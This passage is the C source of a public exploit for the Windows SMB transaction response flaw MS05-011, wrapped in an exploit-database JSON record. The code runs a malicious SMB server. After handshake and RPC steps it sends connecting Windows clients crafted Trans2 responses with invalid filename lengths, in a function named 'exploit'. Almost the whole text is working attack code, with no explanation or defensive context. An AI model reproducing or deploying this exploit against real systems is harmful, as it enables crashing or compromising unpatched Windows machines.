0\r\n\"\\x00\" // Reserved: 00\r\n\"\\xd5\\x00\" // Byte Count (BCC): 213\r\n\"\\x00\" // Padding: 00\r\n\"\\x01\\x08\" // Search ID: 0x0801\r\n\"\\x02\\x00\" // Seatch Count: 2\r\n\"\\x01\\x00\" // End of Search: 1\r\n\"\\x00\\x00\" // EA Error offset: 0\r\n\"\\x60\\x00\" // Last Name offset: 96\r\n\"\\x38\\x00\" // Padding: 3800\r\n\"\\x60\\x00\\x00\\x00\" // Next Entry offset: 96\r\n\"\\x00\\x00\\x00\\x00\" // File Index: 0\r\n\"\\xe8\\x35\\xcf\\x94\\x39\\x73\\xc5\\x01\" // Created: Jun 17, 2005 05:39:19.686500000\r\n\"\\xac\\x09\\x3c\\xae\\x39\\x73\\xc5\\x01\" // Last Access: Jun 17, 2005 05:40:02.342750000\r\n\"\\xe8\\x35\\xcf\\x94\\x39\\x73\\xc5\\x01\" // Last Write: Jun 17, 2005 05:39:19.686500000\r\n\"\\x9c\\x81\\x67\\x98\\x39\\x73\\xc5\\x01\" // Change: Jun 17, 2005 05:39:25.717750000\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // End of File: 0\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Allocation Size: 0\r\n\"\\x10\\x00\\x00\\x00\" // File Attributes: 0x00000010\r\n//\"\\x02\\x00\\x00\\x00\" // File Name Len: 2\r\n\"\\xff\\xff\\xff\\xff\" // Bad File Name Len\r\n\"\\x00\\x00\\x00\\x00\" // EA List Length: 0\r\n//\"\\x00\" // Short File Name Len: 0\r\n\"\\xff\" // Bad Short File Name Len\r\n\"\\x00\" // Reserved: 00\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Short File Name:\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Short File Name:\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Short File Name:\r\n\"\\x2e\\x00\" // File Name: .\r\n\"\\x00\\x00\\x00\\x00\" // Next Entry Offset: 0\r\n\"\\x00\\x00\\x00\\x00\" // File Index: 0\r\n\"\\xe8\\x35\\xcf\\x94\\x39\\x73\\xc5\\x01\" // Created: Jun 17, 2005 05:39:19.686500000\r\n\"\\xac\\x09\\x3c\\xae\\x39\\x73\\xc5\\x01\" // Last Access: Jun 17, 2005 05:40:02.342750000\r\n\"\\xe8\\x35\\xcf\\x94\\x39\\x73\\xc5\\x01\" // Last Write: Jun 17, 2005 05:39:19.686500000\r\n\"\\x9c\\x81\\x67\\x98\\x39\\x73\\xc5\\x01\" // Change: Jun 17, 2005 05:39:25.717750000\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // End Of File: 0\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Allocation Size: 0\r\n\"\\x10\\x00\\x00\\x00\" // File Attributes: 0x00000010\r\n\"\\x04\\x00\\x00\\x00\" // File Name Len: 4\r\n\"\\x00\\x00\\x00\\x00\" // EA List Length: 0\r\n\"\\x00\" // Short File Name Len: 0\r\n\"\\x00\" // Reserved: 00\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Short File Name:\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Short File Name:\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Short File Name:\r\n\"\\x2e\\x00\\x2e\\x00\" // File Name: ..\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\"; // Unknown Data: 000000000000\r\n\r\nint\r\ncheck_interface ( char* str )\r\n{\r\n\tint i, j, wks = 0, srv = 0, spl = 0, wrg = 0, foo = 0;\r\n\r\n\t//Interface UUID\r\n\tunsigned char wks_uuid[] = \"\\x98\\xd0\\xff\\x6b\\x12\\xa1\\x10\\x36\\x98\\x33\\x46\\xc3\\xf8\\x7e\\x34\\x5a\";\r\n\tunsigned char srv_uuid[] = \"\\xc8\\x4f\\x32\\x4b\\x70\\x16\\xd3\\x01\\x12\\x78\\x5a\\x47\\xbf\\x6e\\xe1\\x88\";\r\n\tunsigned char spl_uuid[] = \"\\x78\\x56\\x34\\x12\\x34\\x12\\xcd\\xab\\xef\\x00\\x01\\x23\\x45\\x67\\x89\\xab\";\r\n\tunsigned char wrg_uuid[] = \"\\x01\\xd0\\x8c\\x33\\x44\\x22\\xf1\\x31\\xaa\\xaa\\x90\\x00\\x38\\x00\\x10\\x03\";\r\n\r\n\tfor ( i = 0; i < 16; i++ )\r\n\t{\r\n\t\tj = 0;\r\n\t\tif ( str[120 + i] < 0 )\r\n\t\t{\r\n\t\t\tif ( ( str[120 + i] + 0x100 ) == wks_uuid[i] )\r\n\t\t\t\t{ wks++; j = 1; }\r\n\t\t\tif ( ( str[120 + i] + 0x100 ) == srv_uuid[i] )\r\n\t\t\t\t{ srv++; j = 1; }\r\n\t\t\tif ( ( str[120 + i] + 0x100 ) == spl_uuid[i] )\r\n\t\t\t\t{ spl++; j = 1; }\r\n\t\t\tif ( ( str[120 + i] + 0x100 ) == wrg_uuid[i] )\r\n\t\t\t\t{ wrg++; j = 1; }\r\n\t\t\tif ( j == 0 )\r\n\t\t\t\tfoo++;\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\tif ( str[120 + i] == wks_uuid[i] )\r\n\t\t\t\t{ wks++; j = 1; }\r\n\t\t\tif ( str[120 + i] == srv_uuid[i] )\r\n\t\t\t\t{ srv++; j = 1; }\r\n\t\t\tif ( str[120 + i] == spl_uuid[i] )\r\n\t\t\t\t{ spl++; j = 1; }\r\n\t\t\tif ( str[120 + i] == wrg_uuid[i] )\r\n\t\t\t\t{ wrg++; j = 1; }\r\n\t\t\tif ( j == 0 )\r\n\t\t\t\tfoo++;\r\n\t\t}\r\n\t}\r\n\tif ( wks == 16 )\r\n\t\treturn ( 0 );\r\n\telse if ( srv == 16 )\r\n\t\treturn ( 1 );\r\n\telse if ( spl == 16 )\r\n\t\treturn ( 2 );\r\n\telse if ( wrg == 16 )\r\n\t\treturn ( 3 );\r\n\telse\r\n\t{\r\n\t\tprintf ( \"there is/are %d invalid byte(s) in the interface UUID!\\n\", foo );\r\n\t\treturn ( -1 );\r\n\t}\r\n}\r\n\r\nvoid\r\nneg ( int s )\r\n{\r\n\tchar response[1024];\r\n\r\n\tbzero ( &response, sizeof ( response ) );\r\n\trecv ( s, response, sizeof ( response ) -1, 0 );\r\n\r\n\tsend ( s, SmbNeg, sizeof ( SmbNeg ) -1, 0 );\r\n}\r\n\r\nvoid\r\nsessionsetup ( int s, unsigned long userid, unsigned long treeid, int option )\r\n{\r\n\tchar response[1024];\r\n\tunsigned char ntlm_challenge1[] = \"\\xa2\\x75\\x1b\\x10\\xe7\\x62\\xb0\\xc3\";\r\n\tunsigned char ntlm_challenge2[] = \"\\xe1\\xed\\x43\\x66\\xc7\\xa7\\x36\\xbd\";\r\n\r\n\tbzero ( &response, sizeof ( response ) );\r\n\trecv ( s, response, sizeof ( response ) -1, 0 );\r\n\r\n\tprintf ( \"SessionSetupAndXNeg\\n\" );\r\n\tSessionSetupAndXNeg[30] = response[30];\r\n\tSessionSetupAndXNeg[31] = response[31];\r\n\tSessionSetupAndXNeg[34] = response[34];\r\n\tSessionSetupAndXNeg[35] = response[35];\r\n\r\n\tstrncpy ( SessionSetupAndXNeg + 32, ( unsigned char* ) &userid, 2 );\r\n\tif ( option == 0 )\r\n\t\tmemcpy ( SessionSetupAndXNeg + 71, ntlm_challenge1, 8 );\r\n\telse\r\n\t\tmemcpy ( SessionSetupAndXNeg + 71, ntlm_challenge2, 8 );\r\n\r\n\tsend ( s, SessionSetupAndXNeg, sizeof ( SessionSetupAndXNeg ) -1, 0 );\r\n\r\n\tbzero ( &response, sizeof ( response ) );\r\n\trecv ( s, response, sizeof ( response ) -1, 0 );\r\n\r\n\tprintf ( \"SessionSetupAndXAuth\\n\" );\r\n\tSessionSetupAndXAuth[30] = response[30];\r\n\tSessionSetupAndXAuth[31] = response[31];\r\n\tSessionSetupAndXAuth[34] = response[34];\r\n\tSessionSetupAndXAuth[35] = response[35];\r\n\r\n\tstrncpy ( SessionSetupAndXAuth + 32, ( unsigned char* ) &userid, 2 );\r\n\r\n\tsend ( s, SessionSetupAndXAuth, sizeof ( SessionSetupAndXAuth ) -1, 0 );\r\n\r\n\tbzero ( &response, sizeof ( response ) );\r\n\trecv ( s, response, sizeof ( response ) -1, 0 );\r\n\r\n\tprintf ( \"TreeConnectAndX\\n\" );\r\n\tTreeConnectAndX[30] = response[30];\r\n\tTreeConnectAndX[31] = response[31];\r\n\tTreeConnectAndX[34] = response[34];\r\n\tTreeConnectAndX[35] = response[35];\r\n\r\n\tstrncpy ( TreeConnectAndX + 28, ( unsigned char* ) &treeid, 2 );\r\n\tstrncpy ( TreeConnectAndX + 32, ( unsigned char* ) &userid, 2 );\r\n\r\n\tsend ( s, TreeConnectAndX, sizeof ( TreeConnectAndX ) -1, 0 );\r\n}\r\n\r\nvoid\r\ndigg ( int s, unsigned long fid, unsigned long assocgroup, unsigned long userid, unsigned long treeid, int option )\r\n{\r\n\tint ret;\r\n\tchar response[1024];\r\n\tunsigned char srv[] = \"\\x73\\x72\\x76\";\r\n\tunsigned char wks[] = \"\\x77\\x6b\\x73\";\r\n\r\n\tbzero ( &response, sizeof ( response ) );\r\n\trecv ( s, response, sizeof ( response ) -1, 0 );\r\n\r\n\tprintf ( \"SmbNtCreate\\n\" );\r\n\tSmbNtCreate[30] = response[30];\r\n\tSmbNtCreate[31] = response[31];\r\n\tSmbNtCreate[34] = response[34];\r\n\tSmbNtCreate[35] = response[35];\r\n\r\n\tstrncpy ( SmbNtCreate + 28, ( unsigned char* ) &treeid, 2 );\r\n\tstrncpy ( SmbNtCreate + 32, ( unsigned char* ) &userid, 2 );\r\n\tstrncpy ( SmbNtCreate + 42, ( unsigned char* ) &fid, 2 );\r\n\r\n\tsend ( s, SmbNtCreate, sizeof ( SmbNtCreate ) -1, 0 );\r\n\r\n\tbzero ( &response, sizeof ( response ) );\r\n\trecv ( s, response, sizeof ( response ) -1, 0 );\r\n\r\n\tprintf ( \"DceRpc\\n\" );\r\n\tDceRpc[30] = response[30];\r\n\tDceRpc[31] = response[31];\r\n\tDceRpc[34] = response[34];\r\n\tDceRpc[35] = response[35];\r\n\r\n\tstrncpy ( DceRpc + 28, ( unsigned char* ) &treeid, 2 );\r\n\tstrncpy ( DceRpc + 32, ( unsigned char* ) &userid, 2 );\r\n\tstrncpy ( DceRpc + 80, ( unsigned char* ) &assocgroup, 2 );\r\n\r\n\tret = check_interface ( response );\r\n\tif ( ret == 0 )\r\n\t\tmemcpy ( DceRpc + 92, wks, 3 );\r\n\telse if ( ret == 1 )\r\n\t\tmemcpy ( DceRpc + 92, srv, 3 );\r\n\telse if ( ret == 2 );\r\n\telse if ( ret == 3 );\r\n\telse\r\n\t{\r\n\t\tprintf ( \"invalid interface uuid, aborting...\\n\" );\r\n\t\texit ( 1 );\r\n\t}\r\n\r\n\tsend ( s, DceRpc, sizeof ( DceRpc ) -1, 0 );\r\n\r\n\tbzero ( &response, sizeof ( response ) );\r\n\trecv ( s, response, sizeof ( response ) -1, 0 );\r\n\r\n\tif ( option == 1 )\r\n\t{\r\n\t\tprintf ( \"NetrShareEnum\\n\" );\r\n\t\tNetrShareEnum[30] = response[30];\r\n\t\tNetrShareEnum[31] = response[31];\r\n\t\tNetrShareEnum[34] = response[34];\r\n\t\tNetrShareEnum[35] = response[35];\r\n\r\n\t\tstrncpy ( NetrShareEnum + 28, ( unsigned char* ) &treeid, 2 );\r\n\t\tstrncpy ( NetrShareEnum + 32, ( unsigned char* ) &userid, 2 );\r\n\r\n\t\tsend ( s, NetrShareEnum, sizeof ( NetrShareEnum ) -1, 0 );\r\n\t}\r\n\telse if ( ( option == 2 ) && ( ret == 2 ) )\r\n\t{\r\n\t\tprintf ( \"OpenPrinterEx\\n\" );\r\n\t\tOpenPrinterEx[30] = response[30];\r\n\t\tOpenPrinterEx[31] = response[31];\r\n\t\tOpenPrinterEx[34] = response[34];\r\n\t\tOpenPrinterEx[35] = response[35];\r\n\r\n\t\tstrncpy ( OpenPrinterEx + 28, ( unsigned char* ) &treeid, 2 );\r\n\t\tstrncpy ( OpenPrinterEx + 32, ( unsigned char* ) &userid, 2 );\r\n\r\n\t\tsend ( s, OpenPrinterEx, sizeof ( OpenPrinterEx ) -1, 0 );\r\n\r\n\t\tbzero ( &response, sizeof ( response ) );\r\n\t\trecv ( s, response, sizeof ( response ) -1, 0 );\r\n\r\n\t\tprintf ( \"ClosePrinter\\n\" );\r\n\t\tClosePrinter[30] = response[30];\r\n\t\tClosePrinter[31] = response[31];\r\n\t\tClosePrinter[34] = response[34];\r\n\t\tClosePrinter[35] = response[35];\r\n\r\n\t\tstrncpy ( ClosePrinter + 28, ( unsigned char* ) &treeid, 2 );\r\n\t\tstrncpy ( ClosePrinter + 32, ( unsigned char* ) &userid, 2 );\r\n\r\n\t\tsend ( s, ClosePrinter, sizeof ( ClosePrinter ) -1, 0 );\r\n\t}\r\n\telse if ( ( option == 3 ) && ( ret == 3 ) )\r\n\t{\r\n\t\tprintf ( \"OpenHklm\\n\" );\r\n\t\tOpenHklm[30] = response[30];\r\n\t\tOpenHklm[31] = response[31];\r\n\t\tOpenHklm[34] = response[34];\r\n\t\tOpenHklm[35] = response[35];\r\n\r\n\t\tstrncpy ( OpenHklm + 28, ( unsigned char* ) &treeid, 2 );\r\n\t\tstrncpy ( OpenHklm + 32, ( unsigned char* ) &userid, 2 );\r\n\r\n\t\tsend ( s, OpenHklm, sizeof ( OpenHklm ) -1, 0 );\r\n\r\n\t\tbzero ( &response, sizeof ( response ) );\r\n\t\trecv ( s, response, sizeof ( response ) -1, 0 );\r\n\r\n\t\tprintf ( \"OpenKey\\n\" );\r\n\t\tOpenKey[30] = response[30];\r\n\t\tOpenKey[31] = response[31];\r\n\t\tOpenKey[34] = response[34];\r\n\t\tOpenKey[35] = response[35];\r\n\r\n\t\tstrncpy ( OpenKey + 28, ( unsigned char* ) &treeid, 2 );\r\n\t\tstrncpy ( OpenKey + 32, ( unsigned char* ) &userid, 2 );\r\n\r\n\t\tsend ( s, OpenKey, sizeof ( OpenKey ) -1, 0 );\r\n\r\n\t\tbzero ( &response, sizeof ( response ) );\r\n\t\trecv ( s, response, sizeof ( response ) -1, 0 );\r\n\r\n\t\tprintf ( \"CloseKey\\n\" );\r\n\t\tCloseKey[30] = response[30];\r\n\t\tCloseKey[31] = response[31];\r\n\t\tCloseKey[34] = response[34];\r\n\t\tCloseKey[35] = response[35];\r\n\r\n\t\tstrncpy ( CloseKey + 28, ( unsigned char* ) &treeid, 2 );\r\n\t\tstrncpy ( CloseKey + 32, ( unsigned char* ) &userid, 2 );\r\n\r\n\t\tsend ( s, CloseKey, sizeof ( CloseKey ) -1, 0 );\r\n\t}\r\n\telse if ( option == 4 )\r\n\t{\r\n\t\tprintf ( \"NetBios1\\n\" );\r\n\t\tNetBios1[30] = response[30];\r\n\t\tNetBios1[31] = response[31];\r\n\t\tNetBios1[34] = response[34];\r\n\t\tNetBios1[35] = response[35];\r\n\r\n\t\tstrncpy ( NetBios1 + 28, ( unsigned char* ) &treeid, 2 );\r\n\t\tstrncpy ( NetBios1 + 32, ( unsigned char* ) &userid, 2 );\r\n\r\n\t\tsend ( s, NetBios1, sizeof ( NetBios1 ) -1, 0 );\r\n\t}\r\n\telse\r\n\t{\r\n\t\tif ( ret == 0 )\r\n\t\t{\r\n\t\t\tprintf ( \"WksSvc\\n\" );\r\n\t\t\tWksSvc[30] = response[30];\r\n\t\t\tWksSvc[31] = response[31];\r\n\t\t\tWksSvc[34] = response[34];\r\n\t\t\tWksSvc[35] = response[35];\r\n\r\n\t\t\tstrncpy ( WksSvc + 28, ( unsigned char* ) &treeid, 2 );\r\n\t\t\tstrncpy ( WksSvc + 32, ( unsigned char* ) &userid, 2 );\r\n\r\n\t\t\tsend ( s, WksSvc, sizeof ( WksSvc ) -1, 0 );\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\tprintf ( \"SrvSvc\\n\" );\r\n\t\t\tSrvSvc[30] = response[30];\r\n\t\t\tSrvSvc[31] = response[31];\r\n\t\t\tSrvSvc[34] = response[34];\r\n\t\t\tSrvSvc[35] = response[35];\r\n\r\n\t\t\tstrncpy ( SrvSvc + 28, ( unsigned char* ) &treeid, 2 );\r\n\t\t\tstrncpy ( SrvSvc + 32, ( unsigned char* ) &userid, 2 );\r\n\r\n\t\t\tsend ( s, SrvSvc, sizeof ( SrvSvc ) -1, 0 );\r\n\t\t}\r\n\t}\r\n\r\n\tbzero ( &response, sizeof ( response ) );\r\n\trecv ( s, response, sizeof ( response ) -1, 0 );\r\n\r\n\tprintf ( \"SmbClose\\n\" );\r\n\tSmbClose[30] = response[30];\r\n\tSmbClose[31] = response[31];\r\n\tSmbClose[34] = response[34];\r\n\tSmbClose[35] = response[35];\r\n\r\n\tstrncpy ( SmbClose + 28, ( unsigned char* ) &treeid, 2 );\r\n\tstrncpy ( SmbClose + 32, ( unsigned char* ) &userid, 2 );\r\n\r\n\tsend ( s, SmbClose, sizeof ( SmbClose ) -1, 0 );\r\n}\r\n\r\nvoid\r\nexploit ( int s, unsigned long fid, unsigned long assocgroup, unsigned long userid, unsigned long treeid )\r\n{\r\n\tchar response[1024];\r\n\r\n\tbzero ( &response, sizeof ( response ) );\r\n\trecv ( s, response, sizeof ( response ) -1, 0 );\r\n\r\n\tprintf ( \"NetBios2\\n\" );\r\n\tNetBios2[30] = response[30];\r\n\tNetBios2[31] = response[31];\r\n\tNetBios2[34] = response[34];\r\n\tNetBios2[35] = response[35];\r\n\r\n\tstrncpy ( NetBios2 + 28, ( unsigned char* ) &treeid, 2 );\r\n\tstrncpy ( NetBios2 + 32, ( unsigned char* ) &userid, 2 );\r\n\r\n\tsend ( s, NetBios2, sizeof ( NetBios2 ) -1, 0 );\r\n\r\n\tbzero ( &response, sizeof ( response ) );\r\n\trecv ( s, response, sizeof ( response ) -1, 0 );\r\n\r\n\tprintf ( \"Trans2Response1\\n\" );\r\n\tTrans2Response1[30] = response[30];\r\n\tTrans2Response1[31] = response[31];\r\n\tTrans2Response1[34] = response[34];\r\n\tTrans2Response1[35] = response[35];\r\n\r\n\tstrncpy ( Trans2Response1 + 28, ( unsigned char* ) &treeid, 2 );\r\n\tstrncpy ( Trans2Response1 + 32, ( unsigned char* ) &userid, 2 );\r\n\r\n\tsend ( s, Trans2Response1, sizeof ( Trans2Response1 ) -1, 0 );\r\n\r\n\tbzero ( &response, sizeof ( response ) );\r\n\trecv ( s, response, sizeof ( response ) -1, 0 );\r\n\r\n\tprintf ( \"Trans2Response2\\n\" );\r\n\tTrans2Response2[30] = response[30];\r\n\tTrans2Response2[31] = response[31];\r\n\tTrans2Response2[34] = response[34];\r\n\tTrans2Response2[35] = response[35];\r\n\r\n\tstrncpy ( Trans2Response2 + 28, ( unsigned char* ) &treeid, 2 );\r\n\tstrncpy ( Trans2Response2 + 32, ( unsigned char* ) &userid, 2 );\r\n\r\n\tsend ( s, Trans2Response2, sizeof ( Trans2Response2 ) -1, 0 );\r\n\r\n\tbzero ( &response, sizeof ( response ) );\r\n\trecv ( s, response, sizeof ( response ) -1, 0 );\r\n\r\n\tprintf ( \"Trans2Response3\\n\" );\r\n\tTrans2Response3[30] = response[30];\r\n\tTrans2Response3[31] = response[31];\r\n\tTrans2Response3[34] = response[34];\r\n\tTrans2Response3[35] = response[35];\r\n\r\n\tstrncpy ( Trans2Response3 + 28, ( unsigned char* ) &treeid, 2 );\r\n\tstrncpy ( Trans2Response3 + 32, ( unsigned char* ) &userid, 2 );\r\n\r\n\tsend ( s, Trans2Response3, sizeof ( Trans2Response3 ) -1, 0 );\r\n}\r\n\r\nint\r\nmain ( int argc, char* argv[] )\r\n{\r\n\tint s1, s2, i;\r\n\tunsigned long fid = 0x1337;\r\n\tunsigned long treeid = 0x0808;\r\n\tunsigned long userid = 0x0808;\r\n\tunsigned long assocgroup = 0x4756;\r\n\tpid_t childpid;\r\n\tsocklen_t clilen;\r\n\tstruct sockaddr_in cliaddr, servaddr;\r\n\r\n\tbzero ( &servaddr, sizeof ( servaddr ) );\r\n\tservaddr.sin_family = AF_INET;\r\n\tservaddr.sin_addr.s_addr = htonl ( INADDR_ANY );\r\n\tservaddr.sin_port = htons ( PORT );\r\n\r\n\ts1 = socket ( AF_INET, SOCK_STREAM, 0 );\r\n\tbind ( s1, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );\r\n\tlisten ( s1, 1 );\r\n\r\n\tclilen = sizeof ( cliaddr );\r\n\r\n\ts2 = accept ( s1, ( struct sockaddr * ) &cliaddr, &clilen );\r\n\r\n\tclose ( s1 );\r\n\r\n\tprintf ( \"\\n%s\\n\\n\", inet_ntoa ( cliaddr.sin_addr ) );\r\n\r\n\tneg ( s2 ); // Negotiate\r\n\tsessionsetup ( s2, userid, treeid, 0 ); // SessionSetup\r\n\tfor ( i = 0; i < 15; i++ )\r\n\t{\r\n\t\tdigg ( s2, fid, assocgroup, userid, treeid, 0 );\r\n\t\tfid++;\r\n\t\tassocgroup ++;\r\n\t}\r\n\tdigg ( s2, fid, assocgroup, userid, treeid, 1 ); // NetrShareEnum\r\n\tfid++;\r\n\tassocgroup ++;\r\n\tdigg ( s2, fid, assocgroup, userid, treeid, 2 ); // spoolss\r\n\tfid++;\r\n\tassocgroup ++;\r\n\tfor ( i = 0; i < 4; i++ )\r\n\t{\r\n\t\tdigg ( s2, fid, assocgroup, userid, treeid, 0 );\r\n\t\tfid++;\r\n\t\tassocgroup ++;\r\n\t}\r\n\tdigg ( s2, fid, assocgroup, userid, treeid, 3 ); // WinReg\r\n\tuserid++;\r\n\ttreeid++;\r\n\tsessionsetup ( s2, userid, treeid, 1 ); // SessionSetup\r\n\tuserid--;\r\n\ttreeid--;\r\n\tfor ( i = 0; i < 2; i++ )\r\n\t{\r\n\t\tdigg ( s2, fid, assocgroup, userid, treeid, 4 ); // NetBios\r\n\t\tfid++;\r\n\t\tassocgroup ++;\r\n\t}\r\n\ttreeid += 2;\r\n\texploit ( s2, fid, assocgroup, userid, treeid );\r\n\r\n\tprintf ( \"done!\\n\" );\r\n\r\n\tclose ( s2 );\r\n}\r\n\r\n// milw0rm.com [2005-06-23]", "sourceHref": "https://www.exploit-db.com/download/1065", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}

MS Windows (SMB) Transaction Response Handling Exploit (MS05-011)

Description

Related